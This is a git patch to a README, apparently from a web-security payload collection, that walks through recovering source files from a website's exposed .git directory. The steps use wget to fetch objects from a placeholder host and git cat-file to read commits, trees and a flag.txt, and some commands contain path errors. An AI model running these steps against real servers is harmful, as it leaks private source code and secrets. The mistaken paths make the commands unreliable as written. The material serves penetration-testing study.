From 90265b82503ee7bda305e76c29cb02bb6373242f Mon Sep 17 00:00:00 2001
From: Swissky
Date: Sun, 19 Mar 2017 23:51:56 +0100
Subject: [PATCH] Git - methodology
---
 Git Svn insecure files/README.md | 52 +++++++++++++++++++++++++++++---
 1 file changed, 48 insertions(+), 4 deletions(-)
diff --git a/Git Svn insecure files/README.md b/Git Svn insecure files/README.md
index 7bd72f5..bd08257 100644
--- a/Git Svn insecure files/README.md
+++ b/Git Svn insecure files/README.md
@@ -5,13 +5,57 @@ Github example
 2. Git saves all informations in log file .git/logs/HEAD (try 'head' too)
 ```
-0000000000000000000000000000000000000000 07603070376d63d911f608120eb4b5489b507692
-bloorq@gmail.com 1452195279 +0000 commit (initial): index.php initial commit
+0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
+15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael 1489390329 +0000 commit: Initial.
+26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael 1489390330 +0000 commit: Whoops! Remove flag.
+6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael 1489390332 +0000 commit: Prevent directory listing.
 ```
-3. Acces the commit based on the hash -> a directory name (first two signs from hash) and filename (rest of it).git/objects/07/603070376d63d911f608120eb4b5489b507692,
+3. Acces the commit based on the hash -> a directory name (first two signs from hash) and filename (rest of it).git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c,
+```
+# create a .git directory
+git init test
+cd test/.git
-4. Use diggit.py
+# download the file
+wget http://xxx.web.xxx.com/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
+mkdir .git/object/26
+mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
+
+# display the content of the file
+git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
+ tree 323240a3983045cdc0dec2e88c1358e7998f2e39
+ parent 15ca375e54f056a576905b41a417b413c57df6eb
+ author Michael 1489390329 +0000
+ committer Michael 1489390329 +0000
+ Initial.
+```
+
+4. 
Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
+```
+wget http://xxx.web.xxx.com/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
+mkdir .git/object/32
+mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
+
+git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
+ 040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css
+ 100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt
+ 040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts
+ 100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html
+ 040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js
+```
+
+5. Read the data (flag.txt)
+```
+wget http://xxx.web.xxx.com/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
+mkdir .git/object/cb
+mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
+git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
+```
+
+
+
+5. Alternative way : diggit.py
 ```
 ./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
 ./diggit.py -u http://webpage.com -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1